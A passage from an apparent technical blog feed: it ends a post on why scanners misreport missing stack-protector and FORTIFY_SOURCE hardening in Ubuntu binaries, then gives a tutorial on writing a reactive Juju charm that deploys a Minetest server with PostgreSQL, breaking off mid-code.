<p>In this case, <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code> calls <code class="language-plaintext highlighter-rouge">memcpy</code>, So why isn’t there a <code class="language-plaintext highlighter-rouge">__memcpy_chk</code>
call?</p>
<p>I was reading some documentation, and came across this tidbit in a semi but <a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=95556">not
really related bug</a>:</p>
<blockquote>
<p>There are no _<em>memcpy_chk calls, which means GCC did in all cases what is
documented, replace the __builtin</em>__memcpy_chk calls with the corresponding
__builtin_memcpy calls and handled that as usually (which isn’t always a
library call, there are many different options how a builtin memcpy can be
expanded and one can find tune that through various command line options.<br />
It depends on what CPU the code is tuned for, whether it is considered hot or
cold code, whether the size is constant and what constant or if it is variable
and what alignment guarantees the destination and source has.</p>
</blockquote>
<p>Okay, so if we extrapolate this a bit, we can infer that gcc will initially
replace calls to <code class="language-plaintext highlighter-rouge">memcpy</code> to <code class="language-plaintext highlighter-rouge">__memcpy_chk</code>, and then, in a later optimisation run,
it can make a conscious descision to optimise <code class="language-plaintext highlighter-rouge">__memcpy_chk</code> back to the ordinary
<code class="language-plaintext highlighter-rouge">memcpy</code>, depending on some attributes, most notably, “whether the size is
constant and what constant or if it is variable”.</p>
<p>If <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code> only used constant sized arrays of a fixed size, and the size
never changes, then there is no need to perform a length check in <code class="language-plaintext highlighter-rouge">memcpy</code>. In
which case, <code class="language-plaintext highlighter-rouge">__memcpy_chk</code> is a waste of time, and gcc optimises it back to the
ordinary <code class="language-plaintext highlighter-rouge">memcpy</code>.</p>
<p>For a concrete answer, I would need to review the usage of <code class="language-plaintext highlighter-rouge">memcpy</code> in the apt
source code, but I imagine this is what is happening, and it is reasonable.</p>
<p>But this is how we arrive at no Fortify Source functions being used in
<code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>, and I imagine the rest of the binaries on the list will follow
similarly.</p>
<h1 id="conclusion">Conclusion</h1>
<p>The investigation in this article shows that automated scanning tools cannot
determine if Stack Canaries or Fortify Sources have been enabled at compile
time, because those protections simply don’t apply to all binaries, as they can,
and will be omitted or optimised out, if the compiler determines that they are
not applicable or it is safe to proceed without them.</p>
<p>I believe all the binaries on the lists at the beginning of the article are false
positives, and I am confident that all binaries in the Ubuntu archive are built with
<code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> and <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code>, except for rare exceptions
where they are required to be turned off to workaround bugs or issues. These
rare exceptions are always due to good reasons, and should be explicitly
documented in the <code class="language-plaintext highlighter-rouge">debian/rules</code> file of their source packages.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellNot too long ago, I worked on a fairly interesting case where a user claimed that many of the binaries on their system were missing Stack Canaries provided through -fstack-protector-strong and additionally, many were missing Fortify Source being enabled through -D_FORTIFY_SOURCE=2. This is most unusual, since these compiler flags, along with many others, are enabled by default for all packages in the Ubuntu archive. So in this writeup, we are going to investigate this user’s claims, and try get to the bottom of the mystery of the missing compiler hardening options in binaries from the Ubuntu archive. Stay tuned.Learning How to Write Reactive Charms by Porting our Minetest Charm2021-09-07T00:00:00+00:002021-09-07T00:00:00+00:00https://ruffell.nz/programming/writeups/2021/09/07/learning-how-write-reactive-charms-by-porting-minetest-charm<p>It has been a really long time since my last blog post, so let’s fix that by
writing a followup post to my popular article on learning to write Juju Charms,
where we <a href="https://ruffell.nz/programming/writeups/2019/12/02/learning-how-to-write-juju-charms-by-creating-a-minetest-charm.html">wrote a simple Charm to deploy a production ready Minetest server</a>,
complete with postgresql integration through Juju relations.</p>
<p>Today, we are going to go a step further and delve into <em>Reactive Charms</em>, where
we can define and maintain state through <em>flags</em>. Flags let us have a memory of
events that have happened in the past, and only run certain functions to “react”
to changes in those flags.</p>
<p><img src="/assets/images/2021_018.png" alt="hero" /></p>
<p>Reactive Charms are primarily written in Python, and there are a lot of different
submodules that exist to help you develop your Charm. So buckle up, because we
are going to take our little Minetest Charm to the next level.</p>
<!--more-->
<h1 id="original-charms-vs-reactive-charms">Original Charms vs Reactive Charms</h1>
<p>Original Charms could be written in any language, and we decided to write our
old Minetest Charm in bash. Reactive Charms are intended to be developed using
Python 3, and to take advantage of the rich Python submodule ecosystem built
and maintained by the community, which provides simple blueprints to make great
production ready code.</p>
<p>Reactive Charms build on many of the same mechanisms from the older Bash Charms,
and you will find that files like <code class="language-plaintext highlighter-rouge">metadata.yaml</code> and <code class="language-plaintext highlighter-rouge">config.yaml</code> are exactly
the same, so we should be able to reuse some code from our old Charm during its
port to becoming a Reactive charm.</p>
<p>In that case, make sure you read my previous articles so you have a good
understanding of how hook based Charms work:</p>
<ul>
<li><a href="https://ruffell.nz/programming/writeups/2019/08/26/getting-started-with-juju-to-deploy-and-scale-software.html">Getting Started With Juju to Deploy and Scale Software Effortlessly</a></li>
<li><a href="https://ruffell.nz/programming/writeups/2019/12/02/learning-how-to-write-juju-charms-by-creating-a-minetest-charm.html">Learning How to Write Juju Charms by Creating a Minetest Charm</a></li>
</ul>
<p>There are three notable changes between hook Charms and Reactive Charms.</p>
<h2 id="charmhelpers-library-code">Charmhelpers Library Code</h2>
<p>There is a wealth of already implemented functions you can use to help develop
your Charm, and they are in the <code class="language-plaintext highlighter-rouge">charmhelpers</code> Python module. There is excellent
<a href="https://charm-helpers.readthedocs.io/en/latest/index.html">documentation</a>
available to help you find what these functions do, and what their API is.</p>
<p><code class="language-plaintext highlighter-rouge">charmhelpers</code> helps you write correct code the first time, by implementing
useful things like <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.group_exists">if a group exists</a>
or <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.add_group">creating new groups</a>,
<a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.adduser">adding users</a>,
or <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.add_user_to_group">adding users to groups</a>.</p>
<p>You can also do things like get a <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.hookenv.html#charmhelpers.core.hookenv.Config">dictionary of the Charm’s config.yaml</a>, <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.hookenv.html#charmhelpers.core.hookenv.log">write to the
juju log</a>
or <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.hookenv.html#charmhelpers.core.hookenv.status_set">set juju status information</a>.</p>
<p>Have a look around, and I’m sure you will find all sorts of useful functions to
help you write your Charm.</p>
<h2 id="flags">Flags</h2>
<p>Reactive Charms have the ability to store state, so you can now selectively run
functions only if they meet certain conditions, stored in flags. This is super
useful, since you might only want to generate the configuration file once the
database has been configured, so you don’t want config-changed to be run before
the user relates a database, for example.</p>
<p>It also allows us to implement finite state machines for more complex deployments
where you don’t want race conditions or to jump steps, which is particularly
useful for managing critical data in storage Charms.</p>
<p>Flags can be named anything you want, and we use methods like <code class="language-plaintext highlighter-rouge">set_flag()</code> and
<code class="language-plaintext highlighter-rouge">clear_flag()</code> to manage them.</p>
<p>Flags are actually implemented in the <code class="language-plaintext highlighter-rouge">charms.reactive</code> Python module, and are
used as decorators on your functions. There are a whole bunch of different
decorators you can use, but the common ones are <code class="language-plaintext highlighter-rouge">when()</code>, <code class="language-plaintext highlighter-rouge">when_not()</code>,
<code class="language-plaintext highlighter-rouge">when_any()</code>, <code class="language-plaintext highlighter-rouge">hook()</code>.</p>
<p>A simple example is to guard against only doing something once, much like a
singleton pattern but not as advanced. We can do this by setting a flag:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">@</span><span class="n">when_not</span><span class="p">(</span><span class="s">'myprogram.installed'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">install_myprogram</span><span class="p">():</span>
<span class="c1"># Get your things installed...
</span>
<span class="n">set_flag</span><span class="p">(</span><span class="s">'myprogram.installed'</span><span class="p">)</span>
</code></pre></div></div>
<p>When your Charm is first deployed, <code class="language-plaintext highlighter-rouge">myprogram.installed</code> won’t be set, so we will
run the <code class="language-plaintext highlighter-rouge">install_myprogram()</code> function, and then once we set <code class="language-plaintext highlighter-rouge">myprogram.installed</code>
we can no longer fulfil the <code class="language-plaintext highlighter-rouge">@when_not()</code> decorator, and we won’t run
<code class="language-plaintext highlighter-rouge">install_myprogram()</code> again.</p>
<p>Neat.</p>
<h2 id="layers">Layers</h2>
<p>Layers are all about incorporating the flags and hooks from other Charms, and
putting them to use in your own Charm, helping the code reuse and correctness.</p>
<p>Layers are effectively libraries you can import, and are mostly set and forget
with no need to write any code to make them work. You can set some options in
the layer definition file, and they will be passed to layer functions as needed.</p>
<p>In this guide, we will take advantage of the <code class="language-plaintext highlighter-rouge">basic</code> and <code class="language-plaintext highlighter-rouge">apt</code> layers, as well
as the <code class="language-plaintext highlighter-rouge">pgsql</code> interface for database management. I will show you how they work
slightly later on.</p>
<h1 id="reactive-charm-writing-method">Reactive Charm Writing Method</h1>
<p>I’m again going to be following along the <a href="https://charmsreactive.readthedocs.io/en/latest/index.html">Reactive Charm Documentation</a>
as well as the recommended <a href="https://discourse.charmhub.io/t/tutorial-charm-development-beginner-part-1/377">Reactive Charm Tutorial</a>
found on discourse.</p>
<h2 id="what-you-will-need-to-get-started">What You Will Need To Get Started</h2>
<p>We will need to have Juju installed, and also charm tools. We can get both of
these from the Snap Store.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>snap <span class="nb">install</span> <span class="nt">--classic</span> juju
<span class="nv">$ </span><span class="nb">sudo </span>snap <span class="nb">install</span> <span class="nt">--classic</span> charm
</code></pre></div></div>
<h2 id="create-charm-directory-structure">Create Charm Directory Structure</h2>
<p>Charms are a collection of text files, which are primarily split up into Python
scripts and YAML configuration files.</p>
<p>Much like last time, we will make a directory for our Charms to live in, but
this time, we create two more directories, <code class="language-plaintext highlighter-rouge">layers</code> and <code class="language-plaintext highlighter-rouge">interfaces</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">mkdir</span> <span class="nt">-p</span> ~/charms
<span class="nv">$ </span><span class="nb">mkdir</span> <span class="nt">-p</span> ~/charms/layers
<span class="nv">$ </span><span class="nb">mkdir</span> <span class="nt">-p</span> ~/charms/interfaces
</code></pre></div></div>
<p>We also need to setup some environment variables for Charm tools to use, so
add the following to your <code class="language-plaintext highlighter-rouge">~./bashrc</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> <span class="o"><<</span> <span class="no">EOF</span><span class="sh"> | tee --append ~/.bashrc
export CHARM_LAYERS_DIR="~/charms/layers"
export CHARM_INTERFACES_DIR="~/charms/interfaces"
</span><span class="no">EOF
</span><span class="nv">$ </span><span class="nb">source</span> ~/.bashrc
</code></pre></div></div>
<p>We can use Charm tools to automatically generate the correct directory structure
for us, so run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cd</span> ~/charms/layers
<span class="nv">$ </span>charm create minetest-server
</code></pre></div></div>
<p>You should now have these files in <code class="language-plaintext highlighter-rouge">~/charms/layers/minetest-server</code>:</p>
<p><img src="/assets/images/2021_002.png" alt="directory structure" /></p>
<h2 id="edit-the-readme-file">Edit the README File</h2>
<p>We need a README file to tell our users what our Charm is about, how to deploy
it, and how to scale it. We will tweak what we did last time, and the following
should do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Minetest is a fun, free and open source voxel game inspired by Minecraft.
It supports various game modes, like survival and creative, and many more can
be added with mods.
This Charm deploys a basic game server, and is backed by a PostgreSQL database
for maximum performance. There are no mods, so you will need to add them
yourself.
To deploy:
$ juju bootstrap
$ juju deploy postgresql
$ juju deploy minetest-server
$ juju relate postgresql:db minetest-server:db
$ juju expose minetest-server
</code></pre></div></div>
<h2 id="edit-the-metadatayaml-file">Edit the metadata.yaml File</h2>
<p>The role of <code class="language-plaintext highlighter-rouge">metadata.yaml</code> has not changed, and it still tells Juju what the
Charm is called, what it does, who wrote it, what Ubuntu distribution it is
compatible with, and what interfaces are exposed and required to function.</p>
<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">name</span><span class="pi">:</span> <span class="s">minetest-server</span>
<span class="na">summary</span><span class="pi">:</span> <span class="s">Minetest is a opensource voxel game designed to be modded.</span>
<span class="na">maintainer</span><span class="pi">:</span> <span class="s">Matthew Ruffell <matthew.ruffell@canonical.com></span>
<span class="na">description</span><span class="pi">:</span> <span class="pi">|</span>
<span class="s">Minetest is a fun, opensource voxel game engine that can be customised with</span>
<span class="s">different game modes and mods.</span>
<span class="s">This charm installs Minetest with a PostgreSQL backend.</span>
<span class="na">tags</span><span class="pi">:</span>
<span class="pi">-</span> <span class="s">social</span>
<span class="na">series</span><span class="pi">:</span>
<span class="pi">-</span> <span class="s">hirsute</span>
<span class="pi">-</span> <span class="s">focal</span>
<span class="na">provides</span><span class="pi">:</span>
<span class="na">server</span><span class="pi">:</span>
<span class="na">interface</span><span class="pi">:</span> <span class="s">minetest</span>
<span class="na">requires</span><span class="pi">:</span>
<span class="na">db</span><span class="pi">:</span>
<span class="na">interface</span><span class="pi">:</span> <span class="s">pgsql</span>
</code></pre></div></div>
<h2 id="describe-configuration-options-in-configyaml">Describe Configuration Options in config.yaml</h2>
<p>Since we want users of our Charm to be able to configure the Minetest server
to suit their needs, such as changing the server message of the day, or the port
it is being served on, we need to define configuration variables in <code class="language-plaintext highlighter-rouge">config.yaml</code>.</p>
<p>This is also pretty straightforward.</p>
<p>The only thing to note is you should carefully consider what options you want to
expose to your users. Users don’t really care about the fine details, so only
expose what most people will understand and use.</p>
<p>Saying that, make sure you set sensible defaults. All Charms should work out of
the box on first deployment. If people are interested in changing config, they
will, otherwise they will leave everything alone.</p>
<p>An example config is: (inspired by the existing config.yaml in <a href="https://api.jujucharms.com/charmstore/v5/~jamestait/precise/minetest-server-2/archive/config.yaml">James Tait’s
older minetest charm</a>)</p>
<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">options</span><span class="pi">:</span>
<span class="na">port</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="m">30000</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Server port to listen on</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">int</span>
<span class="na">server-name</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Minetest</span><span class="nv"> </span><span class="s">server"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Name of the server</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">server-description</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Juju</span><span class="nv"> </span><span class="s">deployed</span><span class="nv"> </span><span class="s">Minetest</span><span class="nv"> </span><span class="s">server"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Description of server</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">motd</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Welcome!"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Message of the day</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">strict-protocol-version-checking</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">false"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Set to </span><span class="no">true</span><span class="s"> to disallow old clients from connecting</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">creative-mode</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">false"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Set to </span><span class="no">true</span><span class="s"> to enable creative mode (unlimited inventory)</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">enable-damage</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">false"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Enable players getting damage and dying</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">default-password</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">New users need to input this password</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">default-privs</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">build,shout"</span>
<span class="na">description</span><span class="pi">:</span> <span class="pi">|</span>
<span class="s">Available privileges: build, shout, teleport, settime, privs, ban</span>
<span class="s">See /privs in game for a full list on your server and mod configuration</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">enable-pvp</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Whether to enable players killing each other</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
</code></pre></div></div>
<h2 id="set-the-copyright-of-the-charm">Set the Copyright of the Charm</h2>
<p>All Charms should include a copyright file, which includes details about the
copyright and licensing status of the files inside the Charm.</p>
<p>We will again use the <a href="https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/">debian/copyright
file format</a>
to license our charm, by placing the following in a file called <code class="language-plaintext highlighter-rouge">copyright</code>.</p>
<p>We will take the <a href="https://github.com/openstack/charm-interface-keystone/blob/master/copyright">OpenStack Keystone Charm copyright</a>
file as inspiration, so the below will do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0
Files: *
Copyright: 2021, Matthew Ruffell.
License: GPL-3
License: GPL-3
This package is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this package; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
.
On Debian systems, the complete text of the GNU General
Public License can be found in `/usr/share/common-licenses/GPL-3'.
</code></pre></div></div>
<h2 id="make-an-icon-for-the-charm-store">Make an Icon for the Charm Store</h2>
<p>If you want your Charm to look nice on the Charm store listing or on the Juju
GUI, then you should probably set an icon.</p>
<p>Open up <code class="language-plaintext highlighter-rouge">icon.svg</code> in Inkscape or whatever vector editor you like,
and make a nice icon:</p>
<p><img src="/assets/images/2021_003.png" alt="icon" /></p>
<p>I used the icon found at <code class="language-plaintext highlighter-rouge">/usr/share/icons/hicolor/scalable/apps/minetest.svg</code>
to make this icon.</p>
<h2 id="defining-layers-and-their-options">Defining Layers and Their Options</h2>
<p>Layers are a mechanism to integrate related Charms into your own Charm. Think
of them as libraries you can import and leverage to perform tasks correctly, so
you don’t have to get into the specifics yourself.</p>
<p>For example, take the <code class="language-plaintext highlighter-rouge">layer:apt</code> layer. This implements package management via
apt, and it will automatically be called when the Charm is deployed in the
install phase. We can include some options in the <code class="language-plaintext highlighter-rouge">options:</code> section, and we can
tell it to automatically install minetest, without having to specify anything
more. The days of manually writing <code class="language-plaintext highlighter-rouge">apt install minetest</code> are over.</p>
<p>The <code class="language-plaintext highlighter-rouge">layer:basic</code> layer implements basic hooks like <code class="language-plaintext highlighter-rouge">start</code>, <code class="language-plaintext highlighter-rouge">stop</code>, and uses
magic to link different hooks and conditions to flags. This is the layer that
is also responsible for autogenerating our hooks directory when we run <code class="language-plaintext highlighter-rouge">charm
build</code>.</p>
<p>Finally, we also specify the <code class="language-plaintext highlighter-rouge">interface:pgsql</code> interface, which tells Juju that
we will be using the postgresql charm, and that we will be using related flags
like <code class="language-plaintext highlighter-rouge">db.connected</code> and <code class="language-plaintext highlighter-rouge">db.database.available</code>.</p>
<p>Our final <code class="language-plaintext highlighter-rouge">layers.yaml</code> looks like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>includes:
- 'layer:basic'
- 'layer:apt'
- 'interface:pgsql'
options:
apt:
packages:
- minetest
</code></pre></div></div>
<h2 id="creating-templates-for-game-configuration-and-system-service-files">Creating Templates for Game Configuration and System Service Files</h2>
<p>Templates are a wonderful new addition to Reactive Charms. They allow us to
define our configuration files in one place, and fill out any unknown variables</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir templates
</code></pre></div></div>
<p>We will need two templates. One, a systemd service file to run minetest on boot,
and the other will be the actual minetest configuration.</p>
<p>Let’s do the systemd service first.</p>
<p>Make a file called <code class="language-plaintext highlighter-rouge">minetest.service</code> and put the following service description in it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=Minetest
Documentation=https://wiki.minetest.net/Main_Page
[Service]
Type=simple
User=minetest
ExecStart=/usr/games/minetest --server
ExecStop=/bin/kill -2 $MAINPID
[Install]
WantedBy=multi-user.target
</code></pre></div></div>
<p>Note, we can use the Jinja2 templating engine to fill variables for us when we
render the file later on. We can place values within <code class="language-plaintext highlighter-rouge">'{{ object.attribute }}'</code>
style syntax.</p>
<p>For example, we can fetch the <code class="language-plaintext highlighter-rouge">server-name</code> configuration from the Juju config
entries with <code class="language-plaintext highlighter-rouge">'{{ config["server-name" }}'</code>. We will pass
in database details later, and use <code class="language-plaintext highlighter-rouge">my_database</code> as an object placeholder for now.</p>
<p>Let’s use this information to create the minetest configuration file. Name it
<code class="language-plaintext highlighter-rouge">world.mt</code> and fill it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>port = {{ config["port"] }}
server_name = {{ config["server-name"] }}
server_description = {{ config["server_description"] }}
motd = {{ config["motd"] }}
strict_protocol_version_checking = {{ config["strict-protocol-version-checking"] }}
creative_mode = {{ config["creative-mode"] }}
enable_damage = {{ config["enable-damage"] }}
default_password = {{ config["default-password"] }}
default_privs = {{ config["default-privs"] }}
enable_pvp = {{ config["enable-pvp"] }}
gameid = minetest
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host= {{ database["private-address"] }} port= {{ database["port"] }} user= {{ database["user"] }} password= {{ database["password"] }} dbname= {{ database["database"] }}
pgsql_player_connection = host= {{ database["private-address"] }} port= {{ database["port"] }} user= {{ database["user"] }} password= {{ database["password"] }} dbname= {{ database["database"] }}
</code></pre></div></div>
<h2 id="writing-the-actual-deployment-and-management-code">Writing the Actual Deployment and Management Code</h2>
<p>In Reactive Charms, we implement the logic to manage the Charm in
<code class="language-plaintext highlighter-rouge">reactive/charm_name.py</code>, or in our case, <code class="language-plaintext highlighter-rouge">reactive/minetest_server.py</code>.</p>
<p>Have a read of the final code, and I’ll commentate how it works below.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">charms.reactive</span> <span class="kn">import</span> <span class="n">when</span><span class="p">,</span> <span class="n">when_not</span><span class="p">,</span> <span class="n">set_flag</span>
<span class="kn">from</span> <span class="nn">charmhelpers.core.host</span> <span class="kn">import</span> <span class="n">group_exists</span><span class="p">,</span> <span class="n">add_group</span><span class="p">,</span> <span class="n">user_exists</span><span class="p">,</span> <span class="n">adduser</span><span class="p">,</span> <span class="n">mkdir</span><span class="p">,</span> <span class="n">service</span><span class="p">,</span> <span class="n">service_restart</span><span class="p">,</span> <span class="n">chownr</span>
<span class="kn">from</span> <span class="nn">charmhelpers.core.templating</span> <span class="kn">import</span> <span class="n">render</span>
<span class="kn">from</span> <span class="nn">charmhelpers.core.hookenv</span> <span class="kn">import</span> <span class="n">log</span><span class="p">,</span> <span class="n">status_set</span><span class="p">,</span> <span class="n">application_version_set</span><span class="p">,</span> <span class="n">config</span><span class="p">,</span> <span class="n">relations_of_type</span>
<span class="kn">from</span> <span class="nn">charmhelpers.fetch</span> <span class="kn">import</span> <span class="n">get_upstream_version</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'apt.installed.minetest'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when_not</span><span class="p">(</span><span class="s">'minetest-server.installed'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">install_minetest_server</span><span class="p">():</span>
<span class="n">log</span><span class="p">(</span><span class="s">"Setting up users and groups"</span><span class="p">,</span> <span class="s">'info'</span><span class="p">)</span>
<span class="c1"># Add minetest group to system if it doesn't exist
</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">group_exists</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">):</span>
<span class="n">add_group</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">,</span> <span class="n">system_group</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="c1"># Add minetest user to system if it doesn't exist
</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">user_exists</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">):</span>
<span class="n">adduser</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">,</span> <span class="n">system_user</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">primary_group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">home_dir</span><span class="o">=</span><span class="s">'/home/minetest'</span><span class="p">)</span>
<span class="c1"># Ensure the minetest world directory exists
</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">path</span><span class="o">=</span><span class="s">'/home/minetest/.minetest/worlds/world'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">perms</span><span class="o">=</span><span class="mo">0o775</span><span class="p">)</span>
<span class="c1"># Ensure permissions are correct
</span> <span class="n">chownr</span><span class="p">(</span><span class="n">path</span><span class="o">=</span><span class="s">'/home/minetest'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">chowntopdir</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="n">log</span><span class="p">(</span><span class="s">"Installing systemd service files"</span><span class="p">,</span> <span class="s">'info'</span><span class="p">)</span>
<span class="c1"># Install the systemd service file
</span> <span class="n">render</span><span class="p">(</span><span class="n">source</span><span class="o">=</span><span class="s">'minetest.service'</span><span class="p">,</span>
<span class="n">target</span><span class="o">=</span><span class="s">'/etc/systemd/system/minetest.service'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span>
<span class="n">perms</span><span class="o">=</span><span class="mo">0o644</span><span class="p">,</span>
<span class="n">context</span><span class="o">=</span><span class="p">{</span>
<span class="p">})</span>
<span class="c1"># Set the version number in Juju to what was installed
</span> <span class="n">application_version_set</span><span class="p">(</span><span class="n">get_upstream_version</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">))</span>
<span class="c1"># Enable the minetest service
</span> <span class="n">service</span><span class="p">(</span><span class="s">'enable'</span><span class="p">,</span> <span class="s">'minetest.service'</span><span class="p">)</span>
<span class="c1"># We are all installed now, we don't need to call this function again
</span> <span class="n">set_flag</span><span class="p">(</span><span class="s">'minetest-server.installed'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'config.changed'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'minetest.database.configured'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">minetest_regenerate_configuration</span><span class="p">():</span>
<span class="n">status_set</span><span class="p">(</span><span class="s">'maintenance'</span><span class="p">,</span> <span class="s">'Configuring minetest'</span><span class="p">)</span>
<span class="c1"># Fetch our minetest and database configuration variables
</span> <span class="n">my_config</span> <span class="o">=</span> <span class="n">config</span><span class="p">()</span>
<span class="n">my_database</span> <span class="o">=</span> <span class="n">relations_of_type</span><span class="p">(</span><span class="s">'db'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">log</span><span class="p">(</span><span class="s">"Installing minetest configuration file"</span><span class="p">,</span> <span class="s">'info'</span><span class="p">)</span>
<span class="c1"># Populate the configuration file and install it in place
</span> <span class="n">render</span><span class="p">(</span><span class="n">source</span><span class="o">=</span><span class="s">'world.mt'</span><span class="p">,</span>
<span class="n">target</span><span class="o">=</span><span class="s">'/home/minetest/.minetest/worlds/world/world.mt'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">perms</span><span class="o">=</span><span class="mo">0o664</span><span class="p">,</span>
<span class="n">context</span><span class="o">=</span><span class="p">{</span>
<span class="s">'config'</span><span class="p">:</span><span class="n">my_config</span><span class="p">,</span>
<span class="s">'database'</span><span class="p">:</span><span class="n">my_database</span><span class="p">,</span>
